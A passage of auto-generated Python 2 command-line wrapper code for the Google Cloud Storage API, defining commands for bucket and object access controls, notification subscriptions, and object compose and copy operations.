allAuthenticatedUsers.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageDefaultObjectAccessControlsDeleteRequest(
bucket=bucket.decode('utf8'),
entity=entity.decode('utf8'),
)
result = client.defaultObjectAccessControls.Delete(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class DefaultObjectAccessControlsGet(apitools_base_cli.NewCmd):
"""Command wrapping defaultObjectAccessControls.Get."""
usage = """defaultObjectAccessControls_get <bucket> <entity>"""
def __init__(self, name, fv):
super(DefaultObjectAccessControlsGet, self).__init__(name, fv)
def RunWithArgs(self, bucket, entity):
"""Returns the default object ACL entry for the specified entity on the
specified bucket.
Args:
bucket: Name of a bucket.
entity: The entity holding the permission. Can be user-userId, user-
emailAddress, group-groupId, group-emailAddress, allUsers, or
allAuthenticatedUsers.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageDefaultObjectAccessControlsGetRequest(
bucket=bucket.decode('utf8'),
entity=entity.decode('utf8'),
)
result = client.defaultObjectAccessControls.Get(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class DefaultObjectAccessControlsInsert(apitools_base_cli.NewCmd):
"""Command wrapping defaultObjectAccessControls.Insert."""
usage = """defaultObjectAccessControls_insert <bucket>"""
def __init__(self, name, fv):
super(DefaultObjectAccessControlsInsert, self).__init__(name, fv)
flags.DEFINE_string(
'domain',
None,
u'The domain associated with the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'email',
None,
u'The email address associated with the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'entity',
None,
u'The entity holding the permission, in one of the following forms: '
u'- user-userId - user-email - group-groupId - group-email - '
u'domain-domain - project-team-projectId - allUsers - '
u'allAuthenticatedUsers Examples: - The user liz@example.com would '
u'be user-liz@example.com. - The group example@googlegroups.com '
u'would be group-example@googlegroups.com. - To refer to all members'
u' of the Google Apps for Business domain example.com, the entity '
u'would be domain-example.com.',
flag_values=fv)
flags.DEFINE_string(
'entityId',
None,
u'The ID for the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'etag',
None,
u'HTTP 1.1 Entity tag for the access-control entry.',
flag_values=fv)
flags.DEFINE_string(
'generation',
None,
u'The content generation of the object.',
flag_values=fv)
flags.DEFINE_string(
'id',
None,
u'The ID of the access-control entry.',
flag_values=fv)
flags.DEFINE_string(
'kind',
u'storage#objectAccessControl',
u'The kind of item this is. For object access control entries, this '
u'is always storage#objectAccessControl.',
flag_values=fv)
flags.DEFINE_string(
'object',
None,
u'The name of the object.',
flag_values=fv)
flags.DEFINE_string(
'projectTeam',
None,
u'The project team associated with the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'role',
None,
u'The access permission for the entity. Can be READER or OWNER.',
flag_values=fv)
flags.DEFINE_string(
'selfLink',
None,
u'The link to this access-control entry.',
flag_values=fv)
def RunWithArgs(self, bucket):
"""Creates a new default object ACL entry on the specified bucket.
Args:
bucket: The name of the bucket.
Flags:
domain: The domain associated with the entity, if any.
email: The email address associated with the entity, if any.
entity: The entity holding the permission, in one of the following
forms: - user-userId - user-email - group-groupId - group-email -
domain-domain - project-team-projectId - allUsers -
allAuthenticatedUsers Examples: - The user liz@example.com would be
user-liz@example.com. - The group example@googlegroups.com would be
group-example@googlegroups.com. - To refer to all members of the
Google Apps for Business domain example.com, the entity would be
domain-example.com.
entityId: The ID for the entity, if any.
etag: HTTP 1.1 Entity tag for the access-control entry.
generation: The content generation of the object.
id: The ID of the access-control entry.
kind: The kind of item this is. For object access control entries, this
is always storage#objectAccessControl.
object: The name of the object.
projectTeam: The project team associated with the entity, if any.
role: The access permission for the entity. Can be READER or OWNER.
selfLink: The link to this access-control entry.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.ObjectAccessControl(
bucket=bucket.decode('utf8'),
)
if FLAGS['domain'].present:
request.domain = FLAGS.domain.decode('utf8')
if FLAGS['email'].present:
request.email = FLAGS.email.decode('utf8')
if FLAGS['entity'].present:
request.entity = FLAGS.entity.decode('utf8')
if FLAGS['entityId'].present:
request.entityId = FLAGS.entityId.decode('utf8')
if FLAGS['etag'].present:
request.etag = FLAGS.etag.decode('utf8')
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
if FLAGS['id'].present:
request.id = FLAGS.id.decode('utf8')
if FLAGS['kind'].present:
request.kind = FLAGS.kind.decode('utf8')
if FLAGS['object'].present:
request.object = FLAGS.object.decode('utf8')
if FLAGS['projectTeam'].present:
request.projectTeam = apitools_base.JsonToMessage(messages.ObjectAccessControl.ProjectTeamValue, FLAGS.projectTeam)
if FLAGS['role'].present:
request.role = FLAGS.role.decode('utf8')
if FLAGS['selfLink'].present:
request.selfLink = FLAGS.selfLink.decode('utf8')
result = client.defaultObjectAccessControls.Insert(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class DefaultObjectAccessControlsList(apitools_base_cli.NewCmd):
"""Command wrapping defaultObjectAccessControls.List."""
usage = """defaultObjectAccessControls_list <bucket>"""
def __init__(self, name, fv):
super(DefaultObjectAccessControlsList, self).__init__(name, fv)
flags.DEFINE_string(
'ifMetagenerationMatch',
None,
u"If present, only return default ACL listing if the bucket's current"
u' metageneration matches this value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationNotMatch',
None,
u"If present, only return default ACL listing if the bucket's current"
u' metageneration does not match the given value.',
flag_values=fv)
def RunWithArgs(self, bucket):
"""Retrieves default object ACL entries on the specified bucket.
Args:
bucket: Name of a bucket.
Flags:
ifMetagenerationMatch: If present, only return default ACL listing if
the bucket's current metageneration matches this value.
ifMetagenerationNotMatch: If present, only return default ACL listing if
the bucket's current metageneration does not match the given value.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageDefaultObjectAccessControlsListRequest(
bucket=bucket.decode('utf8'),
)
if FLAGS['ifMetagenerationMatch'].present:
request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
if FLAGS['ifMetagenerationNotMatch'].present:
request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
result = client.defaultObjectAccessControls.List(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class DefaultObjectAccessControlsPatch(apitools_base_cli.NewCmd):
"""Command wrapping defaultObjectAccessControls.Patch."""
usage = """defaultObjectAccessControls_patch <bucket> <entity>"""
def __init__(self, name, fv):
super(DefaultObjectAccessControlsPatch, self).__init__(name, fv)
flags.DEFINE_string(
'domain',
None,
u'The domain associated with the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'email',
None,
u'The email address associated with the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'entityId',
None,
u'The ID for the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'etag',
None,
u'HTTP 1.1 Entity tag for the access-control entry.',
flag_values=fv)
flags.DEFINE_string(
'generation',
None,
u'The content generation of the object.',
flag_values=fv)
flags.DEFINE_string(
'id',
None,
u'The ID of the access-control entry.',
flag_values=fv)
flags.DEFINE_string(
'kind',
u'storage#objectAccessControl',
u'The kind of item this is. For object access control entries, this '
u'is always storage#objectAccessControl.',
flag_values=fv)
flags.DEFINE_string(
'object',
None,
u'The name of the object.',
flag_values=fv)
flags.DEFINE_string(
'projectTeam',
None,
u'The project team associated with the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'role',
None,
u'The access permission for the entity. Can be READER or OWNER.',
flag_values=fv)
flags.DEFINE_string(
'selfLink',
None,
u'The link to this access-control entry.',
flag_values=fv)
def RunWithArgs(self, bucket, entity):
"""Updates a default object ACL entry on the specified bucket. This method
supports patch semantics.
Args:
bucket: The name of the bucket.
entity: The entity holding the permission, in one of the following
forms: - user-userId - user-email - group-groupId - group-email -
domain-domain - project-team-projectId - allUsers -
allAuthenticatedUsers Examples: - The user liz@example.com would be
user-liz@example.com. - The group example@googlegroups.com would be
group-example@googlegroups.com. - To refer to all members of the
Google Apps for Business domain example.com, the entity would be
domain-example.com.
Flags:
domain: The domain associated with the entity, if any.
email: The email address associated with the entity, if any.
entityId: The ID for the entity, if any.
etag: HTTP 1.1 Entity tag for the access-control entry.
generation: The content generation of the object.
id: The ID of the access-control entry.
kind: The kind of item this is. For object access control entries, this
is always storage#objectAccessControl.
object: The name of the object.
projectTeam: The project team associated with the entity, if any.
role: The access permission for the entity. Can be READER or OWNER.
selfLink: The link to this access-control entry.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.ObjectAccessControl(
bucket=bucket.decode('utf8'),
entity=entity.decode('utf8'),
)
if FLAGS['domain'].present:
request.domain = FLAGS.domain.decode('utf8')
if FLAGS['email'].present:
request.email = FLAGS.email.decode('utf8')
if FLAGS['entityId'].present:
request.entityId = FLAGS.entityId.decode('utf8')
if FLAGS['etag'].present:
request.etag = FLAGS.etag.decode('utf8')
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
if FLAGS['id'].present:
request.id = FLAGS.id.decode('utf8')
if FLAGS['kind'].present:
request.kind = FLAGS.kind.decode('utf8')
if FLAGS['object'].present:
request.object = FLAGS.object.decode('utf8')
if FLAGS['projectTeam'].present:
request.projectTeam = apitools_base.JsonToMessage(messages.ObjectAccessControl.ProjectTeamValue, FLAGS.projectTeam)
if FLAGS['role'].present:
request.role = FLAGS.role.decode('utf8')
if FLAGS['selfLink'].present:
request.selfLink = FLAGS.selfLink.decode('utf8')
result = client.defaultObjectAccessControls.Patch(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class DefaultObjectAccessControlsUpdate(apitools_base_cli.NewCmd):
"""Command wrapping defaultObjectAccessControls.Update."""
usage = """defaultObjectAccessControls_update <bucket> <entity>"""
def __init__(self, name, fv):
super(DefaultObjectAccessControlsUpdate, self).__init__(name, fv)
flags.DEFINE_string(
'domain',
None,
u'The domain associated with the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'email',
None,
u'The email address associated with the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'entityId',
None,
u'The ID for the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'etag',
None,
u'HTTP 1.1 Entity tag for the access-control entry.',
flag_values=fv)
flags.DEFINE_string(
'generation',
None,
u'The content generation of the object.',
flag_values=fv)
flags.DEFINE_string(
'id',
None,
u'The ID of the access-control entry.',
flag_values=fv)
flags.DEFINE_string(
'kind',
u'storage#objectAccessControl',
u'The kind of item this is. For object access control entries, this '
u'is always storage#objectAccessControl.',
flag_values=fv)
flags.DEFINE_string(
'object',
None,
u'The name of the object.',
flag_values=fv)
flags.DEFINE_string(
'projectTeam',
None,
u'The project team associated with the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'role',
None,
u'The access permission for the entity. Can be READER or OWNER.',
flag_values=fv)
flags.DEFINE_string(
'selfLink',
None,
u'The link to this access-control entry.',
flag_values=fv)
def RunWithArgs(self, bucket, entity):
"""Updates a default object ACL entry on the specified bucket.
Args:
bucket: The name of the bucket.
entity: The entity holding the permission, in one of the following
forms: - user-userId - user-email - group-groupId - group-email -
domain-domain - project-team-projectId - allUsers -
allAuthenticatedUsers Examples: - The user liz@example.com would be
user-liz@example.com. - The group example@googlegroups.com would be
group-example@googlegroups.com. - To refer to all members of the
Google Apps for Business domain example.com, the entity would be
domain-example.com.
Flags:
domain: The domain associated with the entity, if any.
email: The email address associated with the entity, if any.
entityId: The ID for the entity, if any.
etag: HTTP 1.1 Entity tag for the access-control entry.
generation: The content generation of the object.
id: The ID of the access-control entry.
kind: The kind of item this is. For object access control entries, this
is always storage#objectAccessControl.
object: The name of the object.
projectTeam: The project team associated with the entity, if any.
role: The access permission for the entity. Can be READER or OWNER.
selfLink: The link to this access-control entry.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.ObjectAccessControl(
bucket=bucket.decode('utf8'),
entity=entity.decode('utf8'),
)
if FLAGS['domain'].present:
request.domain = FLAGS.domain.decode('utf8')
if FLAGS['email'].present:
request.email = FLAGS.email.decode('utf8')
if FLAGS['entityId'].present:
request.entityId = FLAGS.entityId.decode('utf8')
if FLAGS['etag'].present:
request.etag = FLAGS.etag.decode('utf8')
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
if FLAGS['id'].present:
request.id = FLAGS.id.decode('utf8')
if FLAGS['kind'].present:
request.kind = FLAGS.kind.decode('utf8')
if FLAGS['object'].present:
request.object = FLAGS.object.decode('utf8')
if FLAGS['projectTeam'].present:
request.projectTeam = apitools_base.JsonToMessage(messages.ObjectAccessControl.ProjectTeamValue, FLAGS.projectTeam)
if FLAGS['role'].present:
request.role = FLAGS.role.decode('utf8')
if FLAGS['selfLink'].present:
request.selfLink = FLAGS.selfLink.decode('utf8')
result = client.defaultObjectAccessControls.Update(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class NotificationsDelete(apitools_base_cli.NewCmd):
"""Command wrapping notifications.Delete."""
usage = """notifications_delete <notification>"""
def __init__(self, name, fv):
super(NotificationsDelete, self).__init__(name, fv)
def RunWithArgs(self, notification):
"""Permanently deletes a notification subscription.
Args:
notification: ID of the notification to delete.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageNotificationsDeleteRequest(
notification=notification.decode('utf8'),
)
result = client.notifications.Delete(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class NotificationsGet(apitools_base_cli.NewCmd):
"""Command wrapping notifications.Get."""
usage = """notifications_get <notification>"""
def __init__(self, name, fv):
super(NotificationsGet, self).__init__(name, fv)
def RunWithArgs(self, notification):
"""View a notification configuration.
Args:
notification: Notification ID
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageNotificationsGetRequest(
notification=notification.decode('utf8'),
)
result = client.notifications.Get(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class NotificationsInsert(apitools_base_cli.NewCmd):
"""Command wrapping notifications.Insert."""
usage = """notifications_insert"""
def __init__(self, name, fv):
super(NotificationsInsert, self).__init__(name, fv)
flags.DEFINE_string(
'bucket',
None,
u'The name of the bucket this subscription is particular to.',
flag_values=fv)
flags.DEFINE_string(
'custom_attributes',
None,
u'An optional list of additional attributes to attach to each Cloud '
u'PubSub message published for this notification subscription.',
flag_values=fv)
flags.DEFINE_string(
'etag',
None,
u'HTTP 1.1 Entity tag for this subscription notification.',
flag_values=fv)
flags.DEFINE_string(
'event_types',
None,
u'If present, only send notifications about listed event types. If '
u'empty, sent notifications for all event types.',
flag_values=fv)
flags.DEFINE_string(
'id',
None,
u'The ID of the notification.',
flag_values=fv)
flags.DEFINE_string(
'kind',
u'storage#notification',
u'The kind of item this is. For notifications, this is always '
u'storage#notification.',
flag_values=fv)
flags.DEFINE_string(
'object_metadata_format',
u'JSON_API_V1',
u'If payload_content is OBJECT_METADATA, controls the format of that '
u'metadata. Otherwise, must not be set.',
flag_values=fv)
flags.DEFINE_string(
'object_name_prefix',
None,
u'If present, only apply this notification configuration to object '
u'names that begin with this prefix.',
flag_values=fv)
flags.DEFINE_string(
'payload_content',
u'OBJECT_METADATA',
u'The desired content of the Payload. Defaults to OBJECT_METADATA.',
flag_values=fv)
flags.DEFINE_string(
'selfLink',
None,
u'The canonical URL of this notification.',
flag_values=fv)
flags.DEFINE_string(
'topic',
None,
u'The Cloud PubSub topic to which this subscription publishes. '
u"Formatted as: '//pubsub.googleapis.com/projects/{project-"
u"identifier}/topics/{my-topic}'",
flag_values=fv)
def RunWithArgs(self):
"""Creates a notification subscription for a given bucket.
Flags:
bucket: The name of the bucket this subscription is particular to.
custom_attributes: An optional list of additional attributes to attach
to each Cloud PubSub message published for this notification
subscription.
etag: HTTP 1.1 Entity tag for this subscription notification.
event_types: If present, only send notifications about listed event
types. If empty, sent notifications for all event types.
id: The ID of the notification.
kind: The kind of item this is. For notifications, this is always
storage#notification.
object_metadata_format: If payload_content is OBJECT_METADATA, controls
the format of that metadata. Otherwise, must not be set.
object_name_prefix: If present, only apply this notification
configuration to object names that begin with this prefix.
payload_content: The desired content of the Payload. Defaults to
OBJECT_METADATA.
selfLink: The canonical URL of this notification.
topic: The Cloud PubSub topic to which this subscription publishes.
Formatted as: '//pubsub.googleapis.com/projects/{project-
identifier}/topics/{my-topic}'
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.Notification(
)
if FLAGS['bucket'].present:
request.bucket = FLAGS.bucket.decode('utf8')
if FLAGS['custom_attributes'].present:
request.custom_attributes = apitools_base.JsonToMessage(messages.Notification.CustomAttributesValue, FLAGS.custom_attributes)
if FLAGS['etag'].present:
request.etag = FLAGS.etag.decode('utf8')
if FLAGS['event_types'].present:
request.event_types = [x.decode('utf8') for x in FLAGS.event_types]
if FLAGS['id'].present:
request.id = FLAGS.id.decode('utf8')
if FLAGS['kind'].present:
request.kind = FLAGS.kind.decode('utf8')
if FLAGS['object_metadata_format'].present:
request.object_metadata_format = FLAGS.object_metadata_format.decode('utf8')
if FLAGS['object_name_prefix'].present:
request.object_name_prefix = FLAGS.object_name_prefix.decode('utf8')
if FLAGS['payload_content'].present:
request.payload_content = FLAGS.payload_content.decode('utf8')
if FLAGS['selfLink'].present:
request.selfLink = FLAGS.selfLink.decode('utf8')
if FLAGS['topic'].present:
request.topic = FLAGS.topic.decode('utf8')
result = client.notifications.Insert(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class NotificationsList(apitools_base_cli.NewCmd):
"""Command wrapping notifications.List."""
usage = """notifications_list <bucket>"""
def __init__(self, name, fv):
super(NotificationsList, self).__init__(name, fv)
def RunWithArgs(self, bucket):
"""Retrieves a list of notification subscriptions for a given bucket.
Args:
bucket: Name of a GCS bucket.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageNotificationsListRequest(
bucket=bucket.decode('utf8'),
)
result = client.notifications.List(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectAccessControlsDelete(apitools_base_cli.NewCmd):
"""Command wrapping objectAccessControls.Delete."""
usage = """objectAccessControls_delete <bucket> <object> <entity>"""
def __init__(self, name, fv):
super(ObjectAccessControlsDelete, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, selects a specific revision of this object (as opposed '
u'to the latest version, the default).',
flag_values=fv)
def RunWithArgs(self, bucket, object, entity):
"""Permanently deletes the ACL entry for the specified entity on the
specified object.
Args:
bucket: Name of a bucket.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
entity: The entity holding the permission. Can be user-userId, user-
emailAddress, group-groupId, group-emailAddress, allUsers, or
allAuthenticatedUsers.
Flags:
generation: If present, selects a specific revision of this object (as
opposed to the latest version, the default).
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectAccessControlsDeleteRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
entity=entity.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
result = client.objectAccessControls.Delete(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectAccessControlsGet(apitools_base_cli.NewCmd):
"""Command wrapping objectAccessControls.Get."""
usage = """objectAccessControls_get <bucket> <object> <entity>"""
def __init__(self, name, fv):
super(ObjectAccessControlsGet, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, selects a specific revision of this object (as opposed '
u'to the latest version, the default).',
flag_values=fv)
def RunWithArgs(self, bucket, object, entity):
"""Returns the ACL entry for the specified entity on the specified object.
Args:
bucket: Name of a bucket.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
entity: The entity holding the permission. Can be user-userId, user-
emailAddress, group-groupId, group-emailAddress, allUsers, or
allAuthenticatedUsers.
Flags:
generation: If present, selects a specific revision of this object (as
opposed to the latest version, the default).
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectAccessControlsGetRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
entity=entity.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
result = client.objectAccessControls.Get(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectAccessControlsInsert(apitools_base_cli.NewCmd):
"""Command wrapping objectAccessControls.Insert."""
usage = """objectAccessControls_insert <bucket> <object>"""
def __init__(self, name, fv):
super(ObjectAccessControlsInsert, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, selects a specific revision of this object (as opposed '
u'to the latest version, the default).',
flag_values=fv)
flags.DEFINE_string(
'objectAccessControl',
None,
u'A ObjectAccessControl resource to be passed as the request body.',
flag_values=fv)
def RunWithArgs(self, bucket, object):
"""Creates a new ACL entry on the specified object.
Args:
bucket: Name of a bucket.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
Flags:
generation: If present, selects a specific revision of this object (as
opposed to the latest version, the default).
objectAccessControl: A ObjectAccessControl resource to be passed as the
request body.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectAccessControlsInsertRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
if FLAGS['objectAccessControl'].present:
request.objectAccessControl = apitools_base.JsonToMessage(messages.ObjectAccessControl, FLAGS.objectAccessControl)
result = client.objectAccessControls.Insert(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectAccessControlsList(apitools_base_cli.NewCmd):
"""Command wrapping objectAccessControls.List."""
usage = """objectAccessControls_list <bucket> <object>"""
def __init__(self, name, fv):
super(ObjectAccessControlsList, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, selects a specific revision of this object (as opposed '
u'to the latest version, the default).',
flag_values=fv)
def RunWithArgs(self, bucket, object):
"""Retrieves ACL entries on the specified object.
Args:
bucket: Name of a bucket.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
Flags:
generation: If present, selects a specific revision of this object (as
opposed to the latest version, the default).
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectAccessControlsListRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
result = client.objectAccessControls.List(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectAccessControlsPatch(apitools_base_cli.NewCmd):
"""Command wrapping objectAccessControls.Patch."""
usage = """objectAccessControls_patch <bucket> <object> <entity>"""
def __init__(self, name, fv):
super(ObjectAccessControlsPatch, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, selects a specific revision of this object (as opposed '
u'to the latest version, the default).',
flag_values=fv)
flags.DEFINE_string(
'objectAccessControl',
None,
u'A ObjectAccessControl resource to be passed as the request body.',
flag_values=fv)
def RunWithArgs(self, bucket, object, entity):
"""Updates an ACL entry on the specified object. This method supports
patch semantics.
Args:
bucket: Name of a bucket.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
entity: The entity holding the permission. Can be user-userId, user-
emailAddress, group-groupId, group-emailAddress, allUsers, or
allAuthenticatedUsers.
Flags:
generation: If present, selects a specific revision of this object (as
opposed to the latest version, the default).
objectAccessControl: A ObjectAccessControl resource to be passed as the
request body.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectAccessControlsPatchRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
entity=entity.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
if FLAGS['objectAccessControl'].present:
request.objectAccessControl = apitools_base.JsonToMessage(messages.ObjectAccessControl, FLAGS.objectAccessControl)
result = client.objectAccessControls.Patch(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectAccessControlsUpdate(apitools_base_cli.NewCmd):
"""Command wrapping objectAccessControls.Update."""
usage = """objectAccessControls_update <bucket> <object> <entity>"""
def __init__(self, name, fv):
super(ObjectAccessControlsUpdate, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, selects a specific revision of this object (as opposed '
u'to the latest version, the default).',
flag_values=fv)
flags.DEFINE_string(
'objectAccessControl',
None,
u'A ObjectAccessControl resource to be passed as the request body.',
flag_values=fv)
def RunWithArgs(self, bucket, object, entity):
"""Updates an ACL entry on the specified object.
Args:
bucket: Name of a bucket.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
entity: The entity holding the permission. Can be user-userId, user-
emailAddress, group-groupId, group-emailAddress, allUsers, or
allAuthenticatedUsers.
Flags:
generation: If present, selects a specific revision of this object (as
opposed to the latest version, the default).
objectAccessControl: A ObjectAccessControl resource to be passed as the
request body.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectAccessControlsUpdateRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
entity=entity.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
if FLAGS['objectAccessControl'].present:
request.objectAccessControl = apitools_base.JsonToMessage(messages.ObjectAccessControl, FLAGS.objectAccessControl)
result = client.objectAccessControls.Update(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectsCompose(apitools_base_cli.NewCmd):
"""Command wrapping objects.Compose."""
usage = """objects_compose <destinationBucket> <destinationObject>"""
def __init__(self, name, fv):
super(ObjectsCompose, self).__init__(name, fv)
flags.DEFINE_string(
'composeRequest',
None,
u'A ComposeRequest resource to be passed as the request body.',
flag_values=fv)
flags.DEFINE_enum(
'destinationPredefinedAcl',
u'authenticatedRead',
[u'authenticatedRead', u'bucketOwnerFullControl', u'bucketOwnerRead', u'private', u'projectPrivate', u'publicRead'],
u'Apply a predefined set of access controls to the destination '
u'object.',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'generation matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'metageneration matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'download_filename',
'',
'Filename to use for download.',
flag_values=fv)
flags.DEFINE_boolean(
'overwrite',
'False',
'If True, overwrite the existing file when downloading.',
flag_values=fv)
def RunWithArgs(self, destinationBucket, destinationObject):
"""Concatenates a list of existing objects into a new object in the same
bucket.
Args:
destinationBucket: Name of the bucket in which to store the new object.
destinationObject: Name of the new object. For information about how to
URL encode object names to be path safe, see Encoding URI Path Parts.
Flags:
composeRequest: A ComposeRequest resource to be passed as the request
body.
destinationPredefinedAcl: Apply a predefined set of access controls to
the destination object.
ifGenerationMatch: Makes the operation conditional on whether the
object's current generation matches the given value.
ifMetagenerationMatch: Makes the operation conditional on whether the
object's current metageneration matches the given value.
download_filename: Filename to use for download.
overwrite: If True, overwrite the existing file when downloading.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectsComposeRequest(
destinationBucket=destinationBucket.decode('utf8'),
destinationObject=destinationObject.decode('utf8'),
)
if FLAGS['composeRequest'].present:
request.composeRequest = apitools_base.JsonToMessage(messages.ComposeRequest, FLAGS.composeRequest)
if FLAGS['destinationPredefinedAcl'].present:
request.destinationPredefinedAcl = messages.StorageObjectsComposeRequest.DestinationPredefinedAclValueValuesEnum(FLAGS.destinationPredefinedAcl)
if FLAGS['ifGenerationMatch'].present:
request.ifGenerationMatch = int(FLAGS.ifGenerationMatch)
if FLAGS['ifMetagenerationMatch'].present:
request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
download = None
if FLAGS.download_filename:
download = apitools_base.Download.FromFile(FLAGS.download_filename, overwrite=FLAGS.overwrite,
progress_callback=apitools_base.DownloadProgressPrinter,
finish_callback=apitools_base.DownloadCompletePrinter)
result = client.objects.Compose(
request, global_params=global_params, download=download)
print apitools_base_cli.FormatOutput(result)
class ObjectsCopy(apitools_base_cli.NewCmd):
"""Command wrapping objects.Copy."""
usage = """objects_copy <sourceBucket> <sourceObject> <destinationBucket> <destinationObject>"""
def __init__(self, name, fv):
super(ObjectsCopy, self).__init__(name, fv)
flags.DEFINE_enum(
'destinationPredefinedAcl',
u'authenticatedRead',
[u'authenticatedRead', u'bucketOwnerFullControl', u'bucketOwnerRead', u'private', u'projectPrivate', u'publicRead'],
u'Apply a predefined set of access controls to the destination '
u'object.',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationMatch',
None,
u"Makes the operation conditional on whether the destination object's"
u' current generation matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationNotMatch',
None,
u"Makes the operation conditional on whether the destination object's"
u' current generation does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationMatch',
None,
u"Makes the operation conditional on whether the destination object's"
u' current metageneration matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationNotMatch',
None,
u"Makes the operation conditional on whether the destination object's"
u' current metageneration does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifSourceGenerationMatch',
None,
u"Makes the operation conditional on whether the source object's "
u'generation matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifSourceGenerationNotMatch',
None,
u"Makes the operation conditional on whether the source object's "
u'generation does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifSourceMetagenerationMatch',
None,
u"Makes the operation conditional on whether the source object's "
u'current metageneration matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifSourceMetagenerationNotMatch',
None,
u"Makes the operation conditional on whether the source object's "
u'current metageneration does not match the given value.',
flag_values=fv)
